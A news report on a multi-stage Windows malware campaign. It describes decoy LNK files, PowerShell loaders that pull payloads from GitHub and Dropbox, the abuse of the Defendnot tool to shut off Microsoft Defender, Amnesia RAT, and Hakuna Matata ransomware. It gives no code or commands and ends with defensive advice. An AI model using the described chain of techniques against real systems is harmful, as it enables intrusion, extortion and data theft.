New York/San Jose: Cybersecurity researchers have uncovered a highly sophisticated multi-stage malware campaign targeting Windows systems, capable of disabling Microsoft Defender before deploying ransomware, surveillance tools, and banking trojans. Notably, the attack does not exploit any software vulnerability and instead relies entirely on social engineering, legitimate system tools, and trusted cloud services.
According to security analysts, the campaign begins with business-themed decoy documents designed to appear as accounting or office files. Victims receive emails or shared files containing compressed archives. Once extracted, a concealed malicious shortcut (LNK file) is triggered, silently executing PowerShell commands in the background.
Malware downloaded from GitHub and Dropbox
Using PowerShell scripts, the malware downloads encrypted and obfuscated payloads from legitimate cloud platforms such as GitHub, allowing the attack traffic to blend into normal enterprise network activity. This technique significantly reduces the chances of detection by traditional signature-based security tools.
Certified Cyber Crime Investigator Course Launched by Centre for Police Technology
Fortinet threat researchers said the initial loader script establishes system persistence, opens decoy documents to distract the user, and then communicates with the attacker via the Telegram Bot API to confirm successful compromise.
Strategy to disable Microsoft Defender
One of the most dangerous aspects of this campaign is its ability to completely neutralise Microsoft Defender. To achieve this, attackers abused Defendnot, a research tool originally developed to demonstrate weaknesses in Windows Security Center.
By registering a fake antivirus product using this tool, the attackers exploit Windows trust assumptions, forcing Microsoft Defender to automatically shut down. Once Defender is disabled, the system is left fully exposed, allowing additional malicious components to be deployed without resistance.
Four-stage attack execution
Analysts noted that the malware operates in four distinct phases. In the first phase, security defences are disabled. The second phase involves environment reconnaissance and active surveillance, with screenshot-capturing modules exfiltrating visual data of user activity.
In the third phase, the attackers initiate a complete system lockdown, disabling administrative tools, destroying recovery mechanisms, and hijacking file associations. This prevents victims from launching legitimate applications or accessing their own files.
In the final phase, Amnesia RAT is deployed to maintain long-term remote access. The tool enables extensive data theft, targeting browser credentials, cryptocurrency wallets, and sensitive financial information.
Dual deployment of ransomware and WinLocker
Alongside remote access tools, the attackers also deploy Hakuna Matata ransomware, which encrypts user files and appends the NeverMind12F extension. Simultaneously, WinLocker components enforce a full system lockout, displaying countdown timers that pressure victims into contacting attackers to negotiate ransom payments.
Experts warn of rising attack sophistication
Cybersecurity experts say the campaign highlights a dangerous shift in threat actor tactics, where attackers no longer rely on exploitable vulnerabilities but instead abuse trusted system features, administrative tools, and cloud infrastructure.
This evolution poses serious challenges for traditional antivirus and detection mechanisms, particularly those dependent on known malware signatures. Experts have urged organisations and users to remain cautious when opening unexpected files, closely monitor PowerShell activity, restrict shortcut execution, and strengthen endpoint security controls.
Researchers warn that similar campaigns are likely to increase, as attackers continue to weaponise legitimate technologies to bypass security defences and maintain long-term access to compromised systems.
